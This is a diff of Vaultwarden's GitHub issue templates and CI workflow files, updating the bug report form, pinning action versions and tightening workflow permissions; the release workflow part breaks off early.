||||||
<!-- The version number, obtained from the logs (at startup) or the admin diagnostics page -->
|
|
||||||
<!-- This is NOT the version number shown on the web vault, which is versioned separately from vaultwarden -->
|
|
||||||
<!-- Remember to check if your issue exists on the latest version first! -->
|
|
||||||
* vaultwarden version:
|
|
||||||
|
|
||||||
<!-- How the server was installed: Docker image, OS package, built from source, etc. -->
|
|
||||||
* Install method:
|
|
||||||
|
|
||||||
* Clients used: <!-- web vault, desktop, Android, iOS, etc. (if applicable) -->
|
|
||||||
|
|
||||||
* Reverse proxy and version: <!-- if applicable -->
|
|
||||||
|
|
||||||
* MySQL/MariaDB or PostgreSQL version: <!-- if applicable -->
|
|
||||||
|
|
||||||
* Other relevant details:
|
|
||||||
|
|
||||||
### Steps to reproduce
|
|
||||||
<!-- Tell us how to reproduce this issue. What parameters did you set (differently from the defaults)
|
|
||||||
and how did you start vaultwarden? -->
|
|
||||||
|
|
||||||
### Expected behaviour
|
|
||||||
<!-- Tell us what you expected to happen -->
|
|
||||||
|
|
||||||
### Actual behaviour
|
|
||||||
<!-- Tell us what actually happened -->
|
|
||||||
|
|
||||||
### Troubleshooting data
|
|
||||||
<!-- Share any log files, screenshots, or other relevant troubleshooting data -->
|
|
||||||
182
.github/ISSUE_TEMPLATE/bug_report.yml
vendored
Normal file
182
.github/ISSUE_TEMPLATE/bug_report.yml
vendored
Normal file
@@ -0,0 +1,182 @@
|
|||||||
|
name: Bug Report
|
||||||
|
description: File a bug report
|
||||||
|
labels: ["bug"]
|
||||||
|
body:
|
||||||
|
#
|
||||||
|
- type: markdown
|
||||||
|
attributes:
|
||||||
|
value: |
|
||||||
|
Thanks for taking the time to fill out this bug report!
|
||||||
|
|
||||||
|
Please **do not** submit feature requests or ask for help on how to configure Vaultwarden here!
|
||||||
|
|
||||||
|
The [GitHub Discussions](https://github.com/dani-garcia/vaultwarden/discussions/) has sections for Questions and Ideas.
|
||||||
|
|
||||||
|
Our [Wiki](https://github.com/dani-garcia/vaultwarden/wiki/) has topics on how to configure Vaultwarden.
|
||||||
|
|
||||||
|
Also, make sure you are running [](https://github.com/dani-garcia/vaultwarden/releases/latest) of Vaultwarden!
|
||||||
|
|
||||||
|
Be sure to check and validate the Vaultwarden Admin Diagnostics (`/admin/diagnostics`) page for any errors!
|
||||||
|
See here [how to enable the admin page](https://github.com/dani-garcia/vaultwarden/wiki/Enabling-admin-page).
|
||||||
|
|
||||||
|
> [!IMPORTANT]
|
||||||
|
> :bangbang: Search for existing **Open _AND_ Closed** [Issues](https://github.com/dani-garcia/vaultwarden/issues?q=is%3Aissue%20) **_AND_** [Discussions](https://github.com/dani-garcia/vaultwarden/discussions?discussions_q=) regarding your topic before posting!
|
||||||
|
#
|
||||||
|
- type: checkboxes
|
||||||
|
id: checklist
|
||||||
|
attributes:
|
||||||
|
label: Prerequisites
|
||||||
|
description: Please confirm you have completed the following before submitting an issue
|
||||||
|
options:
|
||||||
|
- label: I have searched the existing issues and discussions
|
||||||
|
required: true
|
||||||
|
- label: I have read the documentation
|
||||||
|
required: true
|
||||||
|
#
|
||||||
|
- id: support-string
|
||||||
|
type: textarea
|
||||||
|
attributes:
|
||||||
|
label: Vaultwarden Support String
|
||||||
|
description: Output of the **Generate Support String** from the `/admin/diagnostics` page.
|
||||||
|
placeholder: |
|
||||||
|
1. Go to the Vaultwarden Admin of your instance https://example.domain.tld/admin/diagnostics
|
||||||
|
2. Click on `Generate Support String`
|
||||||
|
3. Click on `Copy To Clipboard`
|
||||||
|
4. Replace this text by pasting it into this textarea without any modifications
|
||||||
|
validations:
|
||||||
|
required: true
|
||||||
|
#
|
||||||
|
- id: version
|
||||||
|
type: input
|
||||||
|
attributes:
|
||||||
|
label: Vaultwarden Build Version
|
||||||
|
description: What version of Vaultwarden are you running?
|
||||||
|
placeholder: ex. v1.34.0 or v1.34.1-53f58b14
|
||||||
|
validations:
|
||||||
|
required: true
|
||||||
|
#
|
||||||
|
- id: deployment
|
||||||
|
type: dropdown
|
||||||
|
attributes:
|
||||||
|
label: Deployment method
|
||||||
|
description: How did you deploy Vaultwarden?
|
||||||
|
multiple: false
|
||||||
|
options:
|
||||||
|
- Official Container Image
|
||||||
|
- Build from source
|
||||||
|
- OS Package (apt, yum/dnf, pacman, apk, nix, ...)
|
||||||
|
- Manually Extracted from Container Image
|
||||||
|
- Downloaded from GitHub Actions Release Workflow
|
||||||
|
- Other method
|
||||||
|
validations:
|
||||||
|
required: true
|
||||||
|
#
|
||||||
|
- id: deployment-other
|
||||||
|
type: textarea
|
||||||
|
attributes:
|
||||||
|
label: Custom deployment method
|
||||||
|
description: If you deployed Vaultwarden via any other method, please describe how.
|
||||||
|
#
|
||||||
|
- id: reverse-proxy
|
||||||
|
type: input
|
||||||
|
attributes:
|
||||||
|
label: Reverse Proxy
|
||||||
|
description: Are you using a reverse proxy, if so which and what version?
|
||||||
|
placeholder: ex. nginx 1.29.0, caddy 2.10.0, traefik 3.4.4, haproxy 3.2
|
||||||
|
validations:
|
||||||
|
required: true
|
||||||
|
#
|
||||||
|
- id: os
|
||||||
|
type: dropdown
|
||||||
|
attributes:
|
||||||
|
label: Host/Server Operating System
|
||||||
|
description: On what operating system are you running the Vaultwarden server?
|
||||||
|
multiple: false
|
||||||
|
options:
|
||||||
|
- Linux
|
||||||
|
- NAS/SAN
|
||||||
|
- Cloud
|
||||||
|
- Windows
|
||||||
|
- macOS
|
||||||
|
- Other
|
||||||
|
validations:
|
||||||
|
required: true
|
||||||
|
#
|
||||||
|
- id: os-version
|
||||||
|
type: input
|
||||||
|
attributes:
|
||||||
|
label: Operating System Version
|
||||||
|
description: What version of the operating system(s) are you seeing the problem on?
|
||||||
|
placeholder: ex. Arch Linux, Ubuntu 24.04, Kubernetes, Synology DSM 7.x, Windows 11
|
||||||
|
#
|
||||||
|
- id: clients
|
||||||
|
type: dropdown
|
||||||
|
attributes:
|
||||||
|
label: Clients
|
||||||
|
description: What client(s) are you seeing the problem on?
|
||||||
|
multiple: true
|
||||||
|
options:
|
||||||
|
- Web Vault
|
||||||
|
- Browser Extension
|
||||||
|
- CLI
|
||||||
|
- Desktop
|
||||||
|
- Android
|
||||||
|
- iOS
|
||||||
|
validations:
|
||||||
|
required: true
|
||||||
|
#
|
||||||
|
- id: client-version
|
||||||
|
type: input
|
||||||
|
attributes:
|
||||||
|
label: Client Version
|
||||||
|
description: What version(s) of the client(s) are you seeing the problem on?
|
||||||
|
placeholder: ex. CLI v2025.7.0, Firefox 140 - v2025.6.1
|
||||||
|
#
|
||||||
|
- id: reproduce
|
||||||
|
type: textarea
|
||||||
|
attributes:
|
||||||
|
label: Steps To Reproduce
|
||||||
|
description: How can we reproduce the behavior.
|
||||||
|
value: |
|
||||||
|
1. Go to '...'
|
||||||
|
2. Click on '....'
|
||||||
|
3. Scroll down to '....'
|
||||||
|
4. Click on '...'
|
||||||
|
5. Etc '...'
|
||||||
|
validations:
|
||||||
|
required: true
|
||||||
|
#
|
||||||
|
- id: expected
|
||||||
|
type: textarea
|
||||||
|
attributes:
|
||||||
|
label: Expected Result
|
||||||
|
description: A clear and concise description of what you expected to happen.
|
||||||
|
validations:
|
||||||
|
required: true
|
||||||
|
#
|
||||||
|
- id: actual
|
||||||
|
type: textarea
|
||||||
|
attributes:
|
||||||
|
label: Actual Result
|
||||||
|
description: A clear and concise description of what is happening.
|
||||||
|
validations:
|
||||||
|
required: true
|
||||||
|
#
|
||||||
|
- id: logs
|
||||||
|
type: textarea
|
||||||
|
attributes:
|
||||||
|
label: Logs
|
||||||
|
description: Provide the logs generated by Vaultwarden during the time this issue occurs.
|
||||||
|
render: text
|
||||||
|
#
|
||||||
|
- id: screenshots
|
||||||
|
type: textarea
|
||||||
|
attributes:
|
||||||
|
label: Screenshots or Videos
|
||||||
|
description: If applicable, add screenshots and/or a short video to help explain your problem.
|
||||||
|
#
|
||||||
|
- id: additional-context
|
||||||
|
type: textarea
|
||||||
|
attributes:
|
||||||
|
label: Additional Context
|
||||||
|
description: Add any other context about the problem here.
|
||||||
10
.github/ISSUE_TEMPLATE/config.yml
vendored
10
.github/ISSUE_TEMPLATE/config.yml
vendored
@@ -1,8 +1,8 @@
|
|||||||
blank_issues_enabled: false
|
blank_issues_enabled: false
|
||||||
contact_links:
|
contact_links:
|
||||||
- name: Discourse forum for vaultwarden
|
- name: GitHub Discussions for Vaultwarden
|
||||||
url: https://vaultwarden.discourse.group/
|
|
||||||
about: Use this forum to request features or get help with usage/configuration.
|
|
||||||
- name: GitHub Discussions for vaultwarden
|
|
||||||
url: https://github.com/dani-garcia/vaultwarden/discussions
|
url: https://github.com/dani-garcia/vaultwarden/discussions
|
||||||
about: An alternative to the Discourse forum, if this is easier for you.
|
about: Use the discussions to request features or get help with usage/configuration.
|
||||||
|
- name: Discourse forum for Vaultwarden
|
||||||
|
url: https://vaultwarden.discourse.group/
|
||||||
|
about: An alternative to the GitHub Discussions, if this is easier for you.
|
||||||
|
|||||||
107
.github/workflows/build.yml
vendored
107
.github/workflows/build.yml
vendored
@@ -1,4 +1,5 @@
|
|||||||
name: Build
|
name: Build
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
on:
|
on:
|
||||||
push:
|
push:
|
||||||
@@ -13,6 +14,7 @@ on:
|
|||||||
- "diesel.toml"
|
- "diesel.toml"
|
||||||
- "docker/Dockerfile.j2"
|
- "docker/Dockerfile.j2"
|
||||||
- "docker/DockerSettings.yaml"
|
- "docker/DockerSettings.yaml"
|
||||||
|
|
||||||
pull_request:
|
pull_request:
|
||||||
paths:
|
paths:
|
||||||
- ".github/workflows/build.yml"
|
- ".github/workflows/build.yml"
|
||||||
@@ -28,12 +30,17 @@ on:
|
|||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
build:
|
build:
|
||||||
|
name: Build and Test ${{ matrix.channel }}
|
||||||
|
permissions:
|
||||||
|
actions: write
|
||||||
|
contents: read
|
||||||
|
# We use Ubuntu 22.04 here because this matches the library versions used within the Debian docker containers
|
||||||
runs-on: ubuntu-22.04
|
runs-on: ubuntu-22.04
|
||||||
timeout-minutes: 120
|
timeout-minutes: 120
|
||||||
# Make warnings errors, this is to prevent warnings slipping through.
|
# Make warnings errors, this is to prevent warnings slipping through.
|
||||||
# This is done globally to prevent rebuilds when the RUSTFLAGS env variable changes.
|
# This is done globally to prevent rebuilds when the RUSTFLAGS env variable changes.
|
||||||
env:
|
env:
|
||||||
RUSTFLAGS: "-D warnings"
|
RUSTFLAGS: "-Dwarnings"
|
||||||
strategy:
|
strategy:
|
||||||
fail-fast: false
|
fail-fast: false
|
||||||
matrix:
|
matrix:
|
||||||
@@ -41,32 +48,33 @@ jobs:
|
|||||||
- "rust-toolchain" # The version defined in rust-toolchain
|
- "rust-toolchain" # The version defined in rust-toolchain
|
||||||
- "msrv" # The supported MSRV
|
- "msrv" # The supported MSRV
|
||||||
|
|
||||||
name: Build and Test ${{ matrix.channel }}
|
|
||||||
|
|
||||||
steps:
|
steps:
|
||||||
# Checkout the repo
|
|
||||||
- name: "Checkout"
|
|
||||||
uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 #v4.1.1
|
|
||||||
# End Checkout the repo
|
|
||||||
|
|
||||||
|
|
||||||
# Install dependencies
|
# Install dependencies
|
||||||
- name: "Install dependencies Ubuntu"
|
- name: "Install dependencies Ubuntu"
|
||||||
run: sudo apt-get update && sudo apt-get install -y --no-install-recommends openssl build-essential libmariadb-dev-compat libpq-dev libssl-dev pkg-config
|
run: sudo apt-get update && sudo apt-get install -y --no-install-recommends openssl build-essential libmariadb-dev-compat libpq-dev libssl-dev pkg-config
|
||||||
# End Install dependencies
|
# End Install dependencies
|
||||||
|
|
||||||
|
# Checkout the repo
|
||||||
|
- name: "Checkout"
|
||||||
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 #v4.2.2
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
fetch-depth: 0
|
||||||
|
# End Checkout the repo
|
||||||
|
|
||||||
# Determine rust-toolchain version
|
# Determine rust-toolchain version
|
||||||
- name: Init Variables
|
- name: Init Variables
|
||||||
id: toolchain
|
id: toolchain
|
||||||
shell: bash
|
shell: bash
|
||||||
|
env:
|
||||||
|
CHANNEL: ${{ matrix.channel }}
|
||||||
run: |
|
run: |
|
||||||
if [[ "${{ matrix.channel }}" == 'rust-toolchain' ]]; then
|
if [[ "${CHANNEL}" == 'rust-toolchain' ]]; then
|
||||||
RUST_TOOLCHAIN="$(grep -oP 'channel.*"(\K.*?)(?=")' rust-toolchain.toml)"
|
RUST_TOOLCHAIN="$(grep -oP 'channel.*"(\K.*?)(?=")' rust-toolchain.toml)"
|
||||||
elif [[ "${{ matrix.channel }}" == 'msrv' ]]; then
|
elif [[ "${CHANNEL}" == 'msrv' ]]; then
|
||||||
RUST_TOOLCHAIN="$(grep -oP 'rust-version.*"(\K.*?)(?=")' Cargo.toml)"
|
RUST_TOOLCHAIN="$(grep -oP 'rust-version.*"(\K.*?)(?=")' Cargo.toml)"
|
||||||
else
|
else
|
||||||
RUST_TOOLCHAIN="${{ matrix.channel }}"
|
RUST_TOOLCHAIN="${CHANNEL}"
|
||||||
fi
|
fi
|
||||||
echo "RUST_TOOLCHAIN=${RUST_TOOLCHAIN}" | tee -a "${GITHUB_OUTPUT}"
|
echo "RUST_TOOLCHAIN=${RUST_TOOLCHAIN}" | tee -a "${GITHUB_OUTPUT}"
|
||||||
# End Determine rust-toolchain version
|
# End Determine rust-toolchain version
|
||||||
@@ -74,7 +82,7 @@ jobs:
|
|||||||
|
|
||||||
# Only install the clippy and rustfmt components on the default rust-toolchain
|
# Only install the clippy and rustfmt components on the default rust-toolchain
|
||||||
- name: "Install rust-toolchain version"
|
- name: "Install rust-toolchain version"
|
||||||
uses: dtolnay/rust-toolchain@be73d7920c329f220ce78e0234b8f96b7ae60248 # master @ 2023-12-07 - 10:22 PM GMT+1
|
uses: dtolnay/rust-toolchain@b3b07ba8b418998c39fb20f53e8b695cdcc8de1b # master @ Apr 29, 2025, 9:22 PM GMT+2
|
||||||
if: ${{ matrix.channel == 'rust-toolchain' }}
|
if: ${{ matrix.channel == 'rust-toolchain' }}
|
||||||
with:
|
with:
|
||||||
toolchain: "${{steps.toolchain.outputs.RUST_TOOLCHAIN}}"
|
toolchain: "${{steps.toolchain.outputs.RUST_TOOLCHAIN}}"
|
||||||
@@ -84,7 +92,7 @@ jobs:
|
|||||||
|
|
||||||
# Install the any other channel to be used for which we do not execute clippy and rustfmt
|
# Install the any other channel to be used for which we do not execute clippy and rustfmt
|
||||||
- name: "Install MSRV version"
|
- name: "Install MSRV version"
|
||||||
uses: dtolnay/rust-toolchain@be73d7920c329f220ce78e0234b8f96b7ae60248 # master @ 2023-12-07 - 10:22 PM GMT+1
|
uses: dtolnay/rust-toolchain@b3b07ba8b418998c39fb20f53e8b695cdcc8de1b # master @ Apr 29, 2025, 9:22 PM GMT+2
|
||||||
if: ${{ matrix.channel != 'rust-toolchain' }}
|
if: ${{ matrix.channel != 'rust-toolchain' }}
|
||||||
with:
|
with:
|
||||||
toolchain: "${{steps.toolchain.outputs.RUST_TOOLCHAIN}}"
|
toolchain: "${{steps.toolchain.outputs.RUST_TOOLCHAIN}}"
|
||||||
@@ -92,11 +100,13 @@ jobs:
|
|||||||
|
|
||||||
# Set the current matrix toolchain version as default
|
# Set the current matrix toolchain version as default
|
||||||
- name: "Set toolchain ${{steps.toolchain.outputs.RUST_TOOLCHAIN}} as default"
|
- name: "Set toolchain ${{steps.toolchain.outputs.RUST_TOOLCHAIN}} as default"
|
||||||
|
env:
|
||||||
|
RUST_TOOLCHAIN: ${{steps.toolchain.outputs.RUST_TOOLCHAIN}}
|
||||||
run: |
|
run: |
|
||||||
# Remove the rust-toolchain.toml
|
# Remove the rust-toolchain.toml
|
||||||
rm rust-toolchain.toml
|
rm rust-toolchain.toml
|
||||||
# Set the default
|
# Set the default
|
||||||
rustup default ${{steps.toolchain.outputs.RUST_TOOLCHAIN}}
|
rustup default "${RUST_TOOLCHAIN}"
|
||||||
|
|
||||||
# Show environment
|
# Show environment
|
||||||
- name: "Show environment"
|
- name: "Show environment"
|
||||||
@@ -106,7 +116,8 @@ jobs:
|
|||||||
# End Show environment
|
# End Show environment
|
||||||
|
|
||||||
# Enable Rust Caching
|
# Enable Rust Caching
|
||||||
- uses: Swatinem/rust-cache@23bce251a8cd2ffc3c1075eaa2367cf899916d84 # v2.7.3
|
- name: Rust Caching
|
||||||
|
uses: Swatinem/rust-cache@98c8021b550208e191a6a3145459bfc9fb29c4c0 # v2.8.0
|
||||||
with:
|
with:
|
||||||
# Use a custom prefix-key to force a fresh start. This is sometimes needed with bigger changes.
|
# Use a custom prefix-key to force a fresh start. This is sometimes needed with bigger changes.
|
||||||
# Like changing the build host from Ubuntu 20.04 to 22.04 for example.
|
# Like changing the build host from Ubuntu 20.04 to 22.04 for example.
|
||||||
@@ -116,33 +127,39 @@ jobs:
|
|||||||
|
|
||||||
# Run cargo tests
|
# Run cargo tests
|
||||||
# First test all features together, afterwards test them separately.
|
# First test all features together, afterwards test them separately.
|
||||||
|
- name: "test features: sqlite,mysql,postgresql,enable_mimalloc,query_logger"
|
||||||
|
id: test_sqlite_mysql_postgresql_mimalloc_logger
|
||||||
|
if: ${{ !cancelled() }}
|
||||||
|
run: |
|
||||||
|
cargo test --features sqlite,mysql,postgresql,enable_mimalloc,query_logger
|
||||||
|
|
||||||
- name: "test features: sqlite,mysql,postgresql,enable_mimalloc"
|
- name: "test features: sqlite,mysql,postgresql,enable_mimalloc"
|
||||||
id: test_sqlite_mysql_postgresql_mimalloc
|
id: test_sqlite_mysql_postgresql_mimalloc
|
||||||
if: $${{ always() }}
|
if: ${{ !cancelled() }}
|
||||||
run: |
|
run: |
|
||||||
cargo test --features sqlite,mysql,postgresql,enable_mimalloc
|
cargo test --features sqlite,mysql,postgresql,enable_mimalloc
|
||||||
|
|
||||||
- name: "test features: sqlite,mysql,postgresql"
|
- name: "test features: sqlite,mysql,postgresql"
|
||||||
id: test_sqlite_mysql_postgresql
|
id: test_sqlite_mysql_postgresql
|
||||||
if: $${{ always() }}
|
if: ${{ !cancelled() }}
|
||||||
run: |
|
run: |
|
||||||
cargo test --features sqlite,mysql,postgresql
|
cargo test --features sqlite,mysql,postgresql
|
||||||
|
|
||||||
- name: "test features: sqlite"
|
- name: "test features: sqlite"
|
||||||
id: test_sqlite
|
id: test_sqlite
|
||||||
if: $${{ always() }}
|
if: ${{ !cancelled() }}
|
||||||
run: |
|
run: |
|
||||||
cargo test --features sqlite
|
cargo test --features sqlite
|
||||||
|
|
||||||
- name: "test features: mysql"
|
- name: "test features: mysql"
|
||||||
id: test_mysql
|
id: test_mysql
|
||||||
if: $${{ always() }}
|
if: ${{ !cancelled() }}
|
||||||
run: |
|
run: |
|
||||||
cargo test --features mysql
|
cargo test --features mysql
|
||||||
|
|
||||||
- name: "test features: postgresql"
|
- name: "test features: postgresql"
|
||||||
id: test_postgresql
|
id: test_postgresql
|
||||||
if: $${{ always() }}
|
if: ${{ !cancelled() }}
|
||||||
run: |
|
run: |
|
||||||
cargo test --features postgresql
|
cargo test --features postgresql
|
||||||
# End Run cargo tests
|
# End Run cargo tests
|
||||||
@@ -151,16 +168,16 @@ jobs:
|
|||||||
# Run cargo clippy, and fail on warnings
|
# Run cargo clippy, and fail on warnings
|
||||||
- name: "clippy features: sqlite,mysql,postgresql,enable_mimalloc"
|
- name: "clippy features: sqlite,mysql,postgresql,enable_mimalloc"
|
||||||
id: clippy
|
id: clippy
|
||||||
if: ${{ always() && matrix.channel == 'rust-toolchain' }}
|
if: ${{ !cancelled() && matrix.channel == 'rust-toolchain' }}
|
||||||
run: |
|
run: |
|
||||||
cargo clippy --features sqlite,mysql,postgresql,enable_mimalloc -- -D warnings
|
cargo clippy --features sqlite,mysql,postgresql,enable_mimalloc
|
||||||
# End Run cargo clippy
|
# End Run cargo clippy
|
||||||
|
|
||||||
|
|
||||||
# Run cargo fmt (Only run on rust-toolchain defined version)
|
# Run cargo fmt (Only run on rust-toolchain defined version)
|
||||||
- name: "check formatting"
|
- name: "check formatting"
|
||||||
id: formatting
|
id: formatting
|
||||||
if: ${{ always() && matrix.channel == 'rust-toolchain' }}
|
if: ${{ !cancelled() && matrix.channel == 'rust-toolchain' }}
|
||||||
run: |
|
run: |
|
||||||
cargo fmt --all -- --check
|
cargo fmt --all -- --check
|
||||||
# End Run cargo fmt
|
# End Run cargo fmt
|
||||||
@@ -170,21 +187,31 @@ jobs:
|
|||||||
# This is useful so all test/clippy/fmt actions are done, and they can all be addressed
|
# This is useful so all test/clippy/fmt actions are done, and they can all be addressed
|
||||||
- name: "Some checks failed"
|
- name: "Some checks failed"
|
||||||
if: ${{ failure() }}
|
if: ${{ failure() }}
|
||||||
|
env:
|
||||||
|
TEST_DB_M_L: ${{ steps.test_sqlite_mysql_postgresql_mimalloc_logger.outcome }}
|
||||||
|
TEST_DB_M: ${{ steps.test_sqlite_mysql_postgresql_mimalloc.outcome }}
|
||||||
|
TEST_DB: ${{ steps.test_sqlite_mysql_postgresql.outcome }}
|
||||||
|
TEST_SQLITE: ${{ steps.test_sqlite.outcome }}
|
||||||
|
TEST_MYSQL: ${{ steps.test_mysql.outcome }}
|
||||||
|
TEST_POSTGRESQL: ${{ steps.test_postgresql.outcome }}
|
||||||
|
CLIPPY: ${{ steps.clippy.outcome }}
|
||||||
|
FMT: ${{ steps.formatting.outcome }}
|
||||||
run: |
|
run: |
|
||||||
echo "### :x: Checks Failed!" >> $GITHUB_STEP_SUMMARY
|
echo "### :x: Checks Failed!" >> "${GITHUB_STEP_SUMMARY}"
|
||||||
echo "" >> $GITHUB_STEP_SUMMARY
|
echo "" >> "${GITHUB_STEP_SUMMARY}"
|
||||||
echo "|Job|Status|" >> $GITHUB_STEP_SUMMARY
|
echo "|Job|Status|" >> "${GITHUB_STEP_SUMMARY}"
|
||||||
echo "|---|------|" >> $GITHUB_STEP_SUMMARY
|
echo "|---|------|" >> "${GITHUB_STEP_SUMMARY}"
|
||||||
echo "|test (sqlite,mysql,postgresql,enable_mimalloc)|${{ steps.test_sqlite_mysql_postgresql_mimalloc.outcome }}|" >> $GITHUB_STEP_SUMMARY
|
echo "|test (sqlite,mysql,postgresql,enable_mimalloc,query_logger)|${TEST_DB_M_L}|" >> "${GITHUB_STEP_SUMMARY}"
|
||||||
echo "|test (sqlite,mysql,postgresql)|${{ steps.test_sqlite_mysql_postgresql.outcome }}|" >> $GITHUB_STEP_SUMMARY
|
echo "|test (sqlite,mysql,postgresql,enable_mimalloc)|${TEST_DB_M}|" >> "${GITHUB_STEP_SUMMARY}"
|
||||||
echo "|test (sqlite)|${{ steps.test_sqlite.outcome }}|" >> $GITHUB_STEP_SUMMARY
|
echo "|test (sqlite,mysql,postgresql)|${TEST_DB}|" >> "${GITHUB_STEP_SUMMARY}"
|
||||||
echo "|test (mysql)|${{ steps.test_mysql.outcome }}|" >> $GITHUB_STEP_SUMMARY
|
echo "|test (sqlite)|${TEST_SQLITE}|" >> "${GITHUB_STEP_SUMMARY}"
|
||||||
echo "|test (postgresql)|${{ steps.test_postgresql.outcome }}|" >> $GITHUB_STEP_SUMMARY
|
echo "|test (mysql)|${TEST_MYSQL}|" >> "${GITHUB_STEP_SUMMARY}"
|
||||||
echo "|clippy (sqlite,mysql,postgresql,enable_mimalloc)|${{ steps.clippy.outcome }}|" >> $GITHUB_STEP_SUMMARY
|
echo "|test (postgresql)|${TEST_POSTGRESQL}|" >> "${GITHUB_STEP_SUMMARY}"
|
||||||
echo "|fmt|${{ steps.formatting.outcome }}|" >> $GITHUB_STEP_SUMMARY
|
echo "|clippy (sqlite,mysql,postgresql,enable_mimalloc)|${CLIPPY}|" >> "${GITHUB_STEP_SUMMARY}"
|
||||||
echo "" >> $GITHUB_STEP_SUMMARY
|
echo "|fmt|${FMT}|" >> "${GITHUB_STEP_SUMMARY}"
|
||||||
echo "Please check the failed jobs and fix where needed." >> $GITHUB_STEP_SUMMARY
|
echo "" >> "${GITHUB_STEP_SUMMARY}"
|
||||||
echo "" >> $GITHUB_STEP_SUMMARY
|
echo "Please check the failed jobs and fix where needed." >> "${GITHUB_STEP_SUMMARY}"
|
||||||
|
echo "" >> "${GITHUB_STEP_SUMMARY}"
|
||||||
exit 1
|
exit 1
|
||||||
|
|
||||||
|
|
||||||
@@ -193,5 +220,5 @@ jobs:
|
|||||||
- name: "All checks passed"
|
- name: "All checks passed"
|
||||||
if: ${{ success() }}
|
if: ${{ success() }}
|
||||||
run: |
|
run: |
|
||||||
echo "### :tada: Checks Passed!" >> $GITHUB_STEP_SUMMARY
|
echo "### :tada: Checks Passed!" >> "${GITHUB_STEP_SUMMARY}"
|
||||||
echo "" >> $GITHUB_STEP_SUMMARY
|
echo "" >> "${GITHUB_STEP_SUMMARY}"
|
||||||
|
|||||||
29
.github/workflows/check-templates.yml
vendored
Normal file
29
.github/workflows/check-templates.yml
vendored
Normal file
@@ -0,0 +1,29 @@
|
|||||||
|
name: Check templates
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
|
on: [ push, pull_request ]
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
docker-templates:
|
||||||
|
name: Validate docker templates
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
|
runs-on: ubuntu-24.04
|
||||||
|
timeout-minutes: 30
|
||||||
|
|
||||||
|
steps:
|
||||||
|
# Checkout the repo
|
||||||
|
- name: "Checkout"
|
||||||
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 #v4.2.2
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
# End Checkout the repo
|
||||||
|
|
||||||
|
- name: Run make to rebuild templates
|
||||||
|
working-directory: docker
|
||||||
|
run: make
|
||||||
|
|
||||||
|
- name: Check for unstaged changes
|
||||||
|
working-directory: docker
|
||||||
|
run: git diff --exit-code
|
||||||
|
continue-on-error: false
|
||||||
46
.github/workflows/hadolint.yml
vendored
46
.github/workflows/hadolint.yml
vendored
@@ -1,20 +1,28 @@
|
|||||||
name: Hadolint
|
name: Hadolint
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
on: [
|
on: [ push, pull_request ]
|
||||||
push,
|
|
||||||
pull_request
|
|
||||||
]
|
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
hadolint:
|
hadolint:
|
||||||
name: Validate Dockerfile syntax
|
name: Validate Dockerfile syntax
|
||||||
runs-on: ubuntu-22.04
|
permissions:
|
||||||
|
contents: read
|
||||||
|
runs-on: ubuntu-24.04
|
||||||
timeout-minutes: 30
|
timeout-minutes: 30
|
||||||
|
|
||||||
steps:
|
steps:
|
||||||
# Checkout the repo
|
# Start Docker Buildx
|
||||||
- name: Checkout
|
- name: Setup Docker Buildx
|
||||||
uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1
|
uses: docker/setup-buildx-action@e468171a9de216ec08956ac3ada2f0791b6bd435 # v3.11.1
|
||||||
# End Checkout the repo
|
# https://github.com/moby/buildkit/issues/3969
|
||||||
|
# Also set max parallelism to 2, the default of 4 breaks GitHub Actions and causes OOMKills
|
||||||
|
with:
|
||||||
|
buildkitd-config-inline: |
|
||||||
|
[worker.oci]
|
||||||
|
max-parallelism = 2
|
||||||
|
driver-opts: |
|
||||||
|
network=host
|
||||||
|
|
||||||
# Download hadolint - https://github.com/hadolint/hadolint/releases
|
# Download hadolint - https://github.com/hadolint/hadolint/releases
|
||||||
- name: Download hadolint
|
- name: Download hadolint
|
||||||
@@ -25,9 +33,25 @@ jobs:
|
|||||||
env:
|
env:
|
||||||
HADOLINT_VERSION: 2.12.0
|
HADOLINT_VERSION: 2.12.0
|
||||||
# End Download hadolint
|
# End Download hadolint
|
||||||
|
# Checkout the repo
|
||||||
|
- name: Checkout
|
||||||
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 #v4.2.2
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
# End Checkout the repo
|
||||||
|
|
||||||
# Test Dockerfiles
|
# Test Dockerfiles with hadolint
|
||||||
- name: Run hadolint
|
- name: Run hadolint
|
||||||
shell: bash
|
shell: bash
|
||||||
run: hadolint docker/Dockerfile.{debian,alpine}
|
run: hadolint docker/Dockerfile.{debian,alpine}
|
||||||
# End Test Dockerfiles
|
# End Test Dockerfiles with hadolint
|
||||||
|
|
||||||
|
# Test Dockerfiles with docker build checks
|
||||||
|
- name: Run docker build check
|
||||||
|
shell: bash
|
||||||
|
run: |
|
||||||
|
echo "Checking docker/Dockerfile.debian"
|
||||||
|
docker build --check . -f docker/Dockerfile.debian
|
||||||
|
echo "Checking docker/Dockerfile.alpine"
|
||||||
|
docker build --check . -f docker/Dockerfile.alpine
|
||||||
|
# End Test Dockerfiles with docker build checks
|
||||||
|
|||||||
208
.github/workflows/release.yml
vendored
208
.github/workflows/release.yml
vendored
@@ -1,4 +1,5 @@
|
|||||||
name: Release
|
name: Release
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
on:
|
on:
|
||||||
push:
|
push:
|
||||||
@@ -6,17 +7,23 @@ on:
|
|||||||
- main
|
- main
|
||||||
|
|
||||||
tags:
|
tags:
|
||||||
- '*'
|
# https://docs.github.com/en/actions/writing-workflows/workflow-syntax-for-github-actions#filter-pattern-cheat-sheet
|
||||||
|
- '[1-2].[0-9]+.[0-9]+'
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
# https://github.com/marketplace/actions/skip-duplicate-actions
|
# https://github.com/marketplace/actions/skip-duplicate-actions
|
||||||
# Some checks to determine if we need to continue with building a new docker.
|
